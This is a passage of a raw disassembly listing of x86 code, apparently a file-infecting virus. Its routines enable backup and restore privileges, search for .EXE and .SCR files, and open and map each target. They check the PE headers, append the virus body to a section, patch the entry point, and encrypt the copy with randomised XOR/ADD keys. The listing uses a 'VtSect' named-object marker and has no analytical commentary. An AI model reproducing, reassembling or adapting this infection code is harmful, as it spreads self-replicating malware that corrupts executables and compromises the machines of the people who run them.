cmp eax, [ebp+10431Ch]
jb short loc_3151D1EC
loc_3151D183: ; CODE XREF: sub_3151D1AE-35�j
cmp eax, 70000000h
jb short loc_3151D1C1
call sub_3151D1AE
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_3151D1AD
add esp, 10h
push dword ptr [ecx]
pop [esp-8+arg_20]
popa
jmp short loc_3151D1C8
; ---------------------------------------------------------------------------
locret_3151D1AD: ; CODE XREF: sub_3151D1AE-F�j
retn
; END OF FUNCTION CHUNK FOR sub_3151D1AE
; =============== S U B R O U T I N E =======================================
sub_3151D1AE proc near ; CODE XREF: sub_3151D1AE-24�p
var_10 = dword ptr -10h
arg_20 = dword ptr 24h
; FUNCTION CHUNK AT 3151D08F SIZE 0000011F BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call near ptr dword_3151C514+10Bh
popa
loc_3151D1C1: ; CODE XREF: sub_3151D1AE-26�j
test eax, 80000000h
jnz short loc_3151D1D6
loc_3151D1C8: ; CODE XREF: sub_3151D1AE-3�j
sub eax, [edi+0Ch]
jb short loc_3151D1D6
cmp eax, [edi+8]
jb loc_3151D112
loc_3151D1D6: ; CODE XREF: sub_3151D1AE-F9�j
; sub_3151D1AE-EB�j ...
dec ecx
jnz loc_3151D08F
loc_3151D1DD: ; CODE XREF: sub_3151CFF5+9�j
; UPX2:3151D077�j ...
mov edi, [esp+0]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_3151D22E
; ---------------------------------------------------------------------------
loc_3151D1EC: ; CODE XREF: sub_3151D1AE-7F�j
; sub_3151D1AE-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+10h+var_10]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_3151D22E: ; CODE XREF: sub_3151D1AE+3C�j
pop edi
pop esi
retn
sub_3151D1AE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3151D231 proc near ; CODE XREF: UPX2:3151D532�p
; FUNCTION CHUNK AT 3151D35B SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jnz loc_3151D35B
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F1Ah]
test eax, eax
pop edi
js loc_3151D35B
call sub_3151B6B3
call near ptr loc_3151D26C+5
push ebx
db 65h
jz short near ptr unk_3151D2AA
imul ebp, [ebp+53h], 72756365h
loc_3151D26C: ; CODE XREF: sub_3151D231+2A�p
imul esi, [ecx+edi*2+41h], 88B5FF00h
sub_3151D231 endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E6Eh]
mov [ebp+104290h], eax
call near ptr loc_3151D2A0+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_3151D307
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_3151D2A0: ; CODE XREF: UPX2:3151D283�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ;
db 13h
db 0
unk_3151D2AA db 0 ; CODE XREF: sub_3151D231+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0Bh
db 0E8h ;
db 0FFh
db 0FFh
db 0E8h ;
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0EEh ;
db 0E7h ;
db 0FFh
db 0FFh
db 0E8h ;
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0CBh ;
db 0E7h ;
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_3151D307: ; CODE XREF: UPX2:3151D291�j
lea eax, [ebp+103DCCh]
push 64h
push eax
push 1
push edi
call dword ptr [ebp+103F26h]
mov [esp], edi
call dword ptr [ebp+103E62h]
sub al, al
lea edi, [ebp+104184h]
push eax
push eax
push eax
push dword ptr [ebp+103DCCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104290h]
push esp
push 4
push edi
call dword ptr [ebp+104290h]
add esp, 14h
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E9Eh]
; START OF FUNCTION CHUNK FOR sub_3151D231
loc_3151D35B: ; CODE XREF: sub_3151D231+A�j
; sub_3151D231+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_3151D231
; =============== S U B R O U T I N E =======================================
sub_3151D35D proc near ; CODE XREF: UPX2:3151D52B�p
; UPX2:3151D537�p ...
lea esi, [ebp+104184h]
push esi
call dword ptr [ebp+103EA2h]
cmp eax, 0FFFFFFFFh
jz locret_3151D42E
mov [ebp+104294h], eax
push 0
push esi
call dword ptr [ebp+103EDEh]
test eax, eax
jz locret_3151D42E
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E7Eh]
cmp eax, 0FFFFFFFFh
jz loc_3151D9AF
mov [ebp+104298h], eax
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+103EAAh]
cmp eax, 0FFFFFFFFh
jz loc_3151D9A3
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EA6h]
cmp eax, 0FFFFFFFFh
jz loc_3151D9A3
mov [ebp+1042ACh], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E82h]
test eax, eax
jz loc_3151D9A3
xor ecx, ecx
mov [ebp+1042B0h], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103ECAh]
test eax, eax
jz loc_3151D97B
mov [ebp+1042B4h], eax
locret_3151D42E: ; CODE XREF: sub_3151D35D+10�j
; sub_3151D35D+27�j ...
retn
sub_3151D35D endp
; ---------------------------------------------------------------------------
loc_3151D42F: ; CODE XREF: sub_3151D55F+188�p
; sub_3151D55F+2A0�p
mov eax, 7327h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ;
db 85h ;
db 0C0h ;
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042C0h], eax
mov eax, 29CBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_3151D474 proc near ; CODE XREF: sub_3151D55F:loc_3151D5D4�p
; sub_3151D55F+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_3151D479: ; CODE XREF: sub_3151D474+23�j
jecxz short locret_3151D4B0
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_3151D4B0
cmp dword ptr [edx+0Ch], 1
jb short loc_3151D479
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+1042ACh]
locret_3151D4B0: ; CODE XREF: sub_3151D474:loc_3151D479�j
; sub_3151D474+1D�j ...
retn
sub_3151D474 endp
; =============== S U B R O U T I N E =======================================
sub_3151D4B1 proc near ; CODE XREF: UPX2:3151D549�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3151D4B1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3151D4BE: ; CODE XREF: UPX2:3151D4DF�j
mov ecx, edi
jmp short loc_3151D4CD
; ---------------------------------------------------------------------------
lea edi, [ebp+104184h]
cld
loc_3151D4C9: ; CODE XREF: UPX2:3151D4DB�j
mov ebx, edi
xor ecx, ecx
loc_3151D4CD: ; CODE XREF: UPX2:3151D4C0�j
; UPX2:3151D4E3�j
lodsb
cmp al, 61h
jb short loc_3151D4D8
cmp al, 7Ah
ja short loc_3151D4D8
sub al, 20h
loc_3151D4D8: ; CODE XREF: UPX2:3151D4D0�j
; UPX2:3151D4D4�j
stosb
cmp al, 5Ch
jz short loc_3151D4C9
cmp al, 2Eh
jz short loc_3151D4BE
cmp al, 0
jnz short loc_3151D4CD
jecxz short locret_3151D4B0
mov eax, [ecx]
cmp eax, 455845h
jz short loc_3151D4FB
cmp eax, 524353h
jnz locret_3151D42E
loc_3151D4FB: ; CODE XREF: UPX2:3151D4EE�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3151D42E
cmp eax, 4E554357h
jz locret_3151D42E
cmp eax, 32334357h
jz locret_3151D42E
cmp eax, 4F545350h
jz locret_3151D42E
xor ebx, ebx
call sub_3151D35D
jnz short loc_3151D542
call sub_3151D231
call sub_3151D35D
jz locret_3151D42E
loc_3151D542: ; CODE XREF: UPX2:3151D530�j
xor edx, edx
call sub_3151D55F
call sub_3151D4B1
call $+5
pop ebp
sub ebp, 10344Fh
jmp loc_3151D959
; =============== S U B R O U T I N E =======================================
sub_3151D55F proc near ; CODE XREF: UPX2:3151D544�p
var_1C = dword ptr -1Ch
push dword ptr fs:[edx]
mov esi, [ebp+1042B4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_3151D959
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_3151D959
test dword ptr [ebx+16h], 2000h
jnz loc_3151D959
test byte ptr [ebx+5Ch], 2
jz loc_3151D959
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_3151D959
cmp eax, 20202020h
jz loc_3151D959
mov ecx, [ebx+0C8h]
jecxz short loc_3151D5D4
push ecx
call near ptr dword_3151C514+4
add ecx, [ebp+1042F8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_3151D5D4: ; CODE XREF: sub_3151D55F+5D�j
call sub_3151D474
jb loc_3151D959
and dword ptr [ebp+1042FCh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_3151D5F4
xor eax, eax
jmp short loc_3151D5F9
; ---------------------------------------------------------------------------
loc_3151D5F4: ; CODE XREF: sub_3151D55F+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_3151D5F9: ; CODE XREF: sub_3151D55F+93�j
mov [ebp+1042BCh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_3151BC54+43h
xor [ebp+1039BEh], dl
mov cl, 20h
xor [ebp+1039BFh], dh
loc_3151D61B: ; CODE XREF: sub_3151D55F+D5�j
push 20h
dec cl
pop eax
js short loc_3151D636
call near ptr dword_3151BC54+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039C0h], edx
jmp short loc_3151D61B
; ---------------------------------------------------------------------------
loc_3151D636: ; CODE XREF: sub_3151D55F+C1�j
test dword ptr [ebp+1039C0h], 2000000h
jz short loc_3151D664
test dword ptr [ebp+1039C0h], 3
jnz short loc_3151D65A
and dword ptr [ebp+1039C0h], 0F7FFFFFFh
jmp short loc_3151D664
; ---------------------------------------------------------------------------
loc_3151D65A: ; CODE XREF: sub_3151D55F+ED�j
or dword ptr [ebp+1039C0h], 10000000h
loc_3151D664: ; CODE XREF: sub_3151D55F+E1�j
; sub_3151D55F+F9�j ...
push 6
pop ecx
loc_3151D66A: ; CODE XREF: sub_3151D55F+129�j
push 6
pop eax
call near ptr dword_3151BC54+43h
mov al, [ebp+1039B8h]
xchg al, [edx+ebp+1039B8h]
mov [ebp+1039B8h], al
loop loc_3151D66A
test dword ptr [ebp+1039C0h], 8
jnz short loc_3151D69F
cmp byte ptr [ebp+1039BAh], 1
jz short loc_3151D664
loc_3151D69F: ; CODE XREF: sub_3151D55F+135�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_3151D6C6
cmp byte ptr [ebp+1039B8h], 5
jz short loc_3151D664
cmp byte ptr [ebp+1039B9h], 5
jz short loc_3151D664
cmp byte ptr [ebp+1039BAh], 5
jz short loc_3151D664
loc_3151D6C6: ; CODE XREF: sub_3151D55F+14A�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_3151D6DB
cmp byte ptr [ebp+1039B8h], 2
ja short loc_3151D664
loc_3151D6DB: ; CODE XREF: sub_3151D55F+171�j
and dword ptr [ebp+104300h], 0
call loc_3151C959
call loc_3151D42F
call sub_3151D962
mov ebx, [ebp+1042B8h]
add ebx, [ebp+1042BCh]
call sub_3151D35D
jz loc_3151D959
mov esi, [ebp+1042B4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_3151D474
jb loc_3151D959
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_3151D74F
mov [ebp+104304h], edi
lea esi, [ebp+1039CCh]
mov ecx, [ebp+101069h]
rep movsb
loc_3151D74F: ; CODE XREF: sub_3151D55F+1DA�j
push edi
mov ecx, 0A73h
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_3151D763
rep movsb
loc_3151D763: ; CODE XREF: sub_3151D55F+200�j
test dword ptr [ebp+1039C0h], 20000000h
jz loc_3151D821
push dword ptr [ebx+28h]
call near ptr dword_3151C514+4
mov edx, [ebp+1042F4h]
test edx, edx
jz loc_3151D821
mov esi, [ebp+1042B4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3151D7A0
xor ecx, ecx
loc_3151D7A0: ; CODE XREF: sub_3151D55F+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_3151D807
mov edi, [esp+1Ch+var_1C]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042C8h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_3151D7E0
neg dword ptr [eax]
loc_3151D7E0: ; CODE XREF: sub_3151D55F+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+104300h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039C0h], 40h
jz short loc_3151D7FE
neg dword ptr [eax]
loc_3151D7FE: ; CODE XREF: sub_3151D55F+29B�j
push ecx
call loc_3151D42F
pop ecx
jmp short loc_3151D813
; ---------------------------------------------------------------------------
loc_3151D807: ; CODE XREF: sub_3151D55F+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3151D813: ; CODE XREF: sub_3151D55F+2A6�j
lea esi, [ebp+1039CCh]
mov [ebp+104304h], edi
rep movsb
loc_3151D821: ; CODE XREF: sub_3151D55F+20E�j
; sub_3151D55F+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039BEh]
jnz short loc_3151D83A
imul edx, 12345678h
loc_3151D83A: ; CODE XREF: sub_3151D55F+2D3�j
mov [eax-19h], dx
call sub_3151B224
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
lea eax, [ecx+5]
jnz short loc_3151D86C
mov [ebp+104300h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_3151D86C: ; CODE XREF: sub_3151D55F+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F7Ch], 1
jz short loc_3151D888
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_3151D888: ; CODE XREF: sub_3151D55F+320�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_3151D89B
push edx
call sub_3151CFF5
pop edx
loc_3151D89B: ; CODE XREF: sub_3151D55F+333�j
mov ecx, [ebp+104300h]
jecxz short loc_3151D8A8
mov [ebx+28h], ecx
jmp short loc_3151D8B5
; ---------------------------------------------------------------------------
loc_3151D8A8: ; CODE XREF: sub_3151D55F+342�j
mov ecx, [ebp+1042FCh]
jecxz short loc_3151D8B2
jmp short loc_3151D8B5
; ---------------------------------------------------------------------------
loc_3151D8B2: ; CODE XREF: sub_3151D55F+34F�j
mov ecx, [ebx+28h]
loc_3151D8B5: ; CODE XREF: sub_3151D55F+347�j
; sub_3151D55F+351�j
test dword ptr [ebp+1039C0h], 3
jz short loc_3151D8D5
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_3151D8D5: ; CODE XREF: sub_3151D55F+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_3151D8E6
mov [edx+8], ecx
loc_3151D8E6: ; CODE XREF: sub_3151D55F+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_3151D917
add ecx, [ebp+101069h]
loc_3151D917: ; CODE XREF: sub_3151D55F+3B0�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_3151D939
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_3151D939
mov dh, [ebp+1039BFh]
loc_3151D939: ; CODE XREF: sub_3151D55F+3C4�j
; sub_3151D55F+3D2�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_3151D950
loc_3151D945: ; CODE XREF: sub_3151D55F+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3151D945
jmp short loc_3151D959
; ---------------------------------------------------------------------------
loc_3151D950: ; CODE XREF: sub_3151D55F+3E4�j
; sub_3151D55F+3F8�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3151D950
loc_3151D959: ; CODE XREF: UPX2:3151D55A�j
; sub_3151D55F+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3151D55F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3151D962 proc near ; CODE XREF: sub_3151D55F+18D�p
cmp dword ptr [ebp+104298h], 0
jz locret_3151D42E
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
loc_3151D97B: ; CODE XREF: sub_3151D35D+C5�j
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
loc_3151D9A3: ; CODE XREF: sub_3151D35D+6B�j
; sub_3151D35D+82�j ...
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
loc_3151D9AF: ; CODE XREF: sub_3151D35D+45�j
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
sub_3151D962 endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038CBh, 0C10FF058h, 10158885h
dd 0C3C08500h, 0F0FFC883h, 8885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104184B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 103F2E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h
dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 0A2ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 5060103h, 4D160207h
dd 0DF2A4EE3h, 119415FFh, 0FF8B0100h, 119h dup(0)
aBasenamedobjec:
unicode 0, <\BaseNamedObjects\VtSect>,0
dw 9B47h
dd 8AD7C80h, 3317C83h, 0ADA07C91h, 7C80h, 0
dd 0BDB60000h, 1A247C80h, 945C7C80h, 23677C80h, 42C7C80h
dd 6377C81h, 4B0F7C81h, 0C0587C86h, 0E7EC7C80h, 0ABDE7C80h
dd 153C7C80h, 0A777C81h, 1C457C81h, 0B6A17C83h, 8FF7C80h
dd 5DCA7C86h, 11DA7C83h, 2ADE7C81h, 1BA57C81h, 1D777C82h
dd 0B9057C80h, 0BB767C80h, 9E17C80h, 3DE57C83h, 3F587C86h
dd 27827C86h, 1CB87C81h, 24427C83h, 0B1C7C80h, 0B9747C81h
dd 9A517C80h, 0D877C80h, 0D4607C81h, 0D6827C90h, 0D7547C90h
dd 0D7697C90h, 0D7937C90h, 7C90h, 0DC550000h, 0DCFD7C90h
dd 0DD907C90h, 0DDBA7C90h, 0DEB67C90h, 0E0457C90h, 0EA327C90h
dd 30C67C90h, 7C91h, 14h dup(0)
dd 320030h, 3151E090h, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 740056h
dd 650053h, 740063h, 0D3h dup(0)
dd offset sub_3151B104
dd 12FCh dup(0)
UPX2 ends
; Section 4. (virtual address 00023000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00023000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31523000h
align 2000h
_idata2 ends
end start